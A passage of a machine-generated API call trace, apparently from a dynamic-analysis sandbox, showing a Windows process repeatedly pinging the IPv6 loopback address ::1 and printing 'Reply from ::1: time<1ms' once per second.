RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0147.793] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0147.793] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0147.793] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0147.793] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0147.793] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0147.793] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0147.793] LocalFree (hMem=0x4a51b8) returned 0x0 [0147.793] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0147.793] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0147.793] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0147.793] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0147.793] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0147.793] LocalFree (hMem=0x4a29e8) returned 0x0 [0147.793] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0147.794] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0147.794] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0147.794] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0147.794] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0147.794] LocalFree (hMem=0x4a8f68) returned 0x0 [0147.794] Sleep (dwMilliseconds=0x3e8) [0148.849] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0148.913] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0148.913] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0148.913] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0148.913] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.913] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0148.914] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.914] LocalFree (hMem=0x4a51b8) returned 0x0 [0148.914] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0148.914] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0148.914] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.914] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0148.914] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.914] LocalFree (hMem=0x4a29e8) returned 0x0 [0148.914] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0148.914] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0148.914] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0148.914] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0148.915] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0148.915] LocalFree (hMem=0x4a8f68) returned 0x0 [0148.915] Sleep (dwMilliseconds=0x3e8) [0150.023] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0150.074] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0150.074] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0150.074] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0150.074] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0150.074] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0150.074] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0150.074] LocalFree (hMem=0x4a51b8) returned 0x0 [0150.074] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0150.074] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0150.074] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0150.074] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0150.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0150.075] LocalFree (hMem=0x4a29e8) returned 0x0 [0150.075] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0150.075] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0150.075] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0150.075] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0150.075] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0150.075] LocalFree (hMem=0x4a8f68) returned 0x0 [0150.075] Sleep (dwMilliseconds=0x3e8) [0151.142] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0151.224] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0151.224] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0151.224] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0151.224] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0151.224] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0151.224] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0151.224] LocalFree (hMem=0x4a51b8) returned 0x0 [0151.224] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0151.224] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0151.224] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0151.224] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0151.224] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0151.224] LocalFree (hMem=0x4a29e8) returned 0x0 [0151.224] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0151.225] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0151.225] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0151.225] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0151.225] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0151.225] LocalFree (hMem=0x4a8f68) returned 0x0 [0151.225] Sleep (dwMilliseconds=0x3e8) [0152.332] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0152.486] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0152.486] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0152.487] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0152.487] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0152.487] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0152.487] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0152.487] LocalFree (hMem=0x4a51b8) returned 0x0 [0152.487] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0152.487] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0152.487] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0152.487] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0152.487] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0152.487] LocalFree (hMem=0x4a29e8) returned 0x0 [0152.487] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0152.487] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0152.487] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0152.487] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0152.488] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0152.488] LocalFree (hMem=0x4a8f68) returned 0x0 [0152.488] Sleep (dwMilliseconds=0x3e8) [0153.588] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0153.673] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0153.673] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0153.673] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0153.673] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0153.673] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0153.673] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0153.673] LocalFree (hMem=0x4a51b8) returned 0x0 [0153.673] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0153.673] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0153.673] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0153.673] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0153.673] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0153.673] LocalFree (hMem=0x4a29e8) returned 0x0 [0153.673] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0153.673] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0153.674] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0153.674] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0153.678] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0153.678] LocalFree (hMem=0x4a8f68) returned 0x0 [0153.678] Sleep (dwMilliseconds=0x3e8) [0154.714] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0154.764] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0154.764] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0154.764] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0154.764] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0154.764] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0154.764] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0154.764] LocalFree (hMem=0x4a51b8) returned 0x0 [0154.764] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0154.764] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0154.764] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0154.764] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0154.765] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0154.765] LocalFree (hMem=0x4a29e8) returned 0x0 [0154.765] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0154.765] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0154.765] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0154.765] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0154.765] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0154.765] LocalFree (hMem=0x4a8f68) returned 0x0 [0154.765] Sleep (dwMilliseconds=0x3e8) [0155.775] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0155.776] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0155.776] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0155.777] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0155.777] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0155.777] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0155.777] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0155.777] LocalFree (hMem=0x4a51b8) returned 0x0 [0155.777] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0155.777] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0155.777] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0155.777] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0155.777] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0155.777] LocalFree (hMem=0x4a29e8) returned 0x0 [0155.777] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0155.777] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0155.777] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0155.777] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0155.778] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0155.778] LocalFree (hMem=0x4a8f68) returned 0x0 [0155.778] Sleep (dwMilliseconds=0x3e8) [0156.791] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0156.901] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0156.901] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0156.901] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0156.901] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0156.901] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0156.901] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0156.901] LocalFree (hMem=0x4a51b8) returned 0x0 [0156.901] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0156.901] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0156.901] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0156.901] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0156.901] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0156.901] LocalFree (hMem=0x4a29e8) returned 0x0 [0156.901] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0156.902] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0156.902] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0156.902] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0156.902] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0156.902] LocalFree (hMem=0x4a8f68) returned 0x0 [0156.902] Sleep (dwMilliseconds=0x3e8) [0157.924] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0157.945] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0157.945] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0157.945] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0157.945] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0157.945] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0157.946] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0157.946] LocalFree (hMem=0x4a51b8) returned 0x0 [0157.946] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0157.946] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0157.946] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0157.946] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0157.946] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0157.946] LocalFree (hMem=0x4a29e8) returned 0x0 [0157.946] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0157.946] CharToOemBuffA (in: lpszSrc="\r\n", 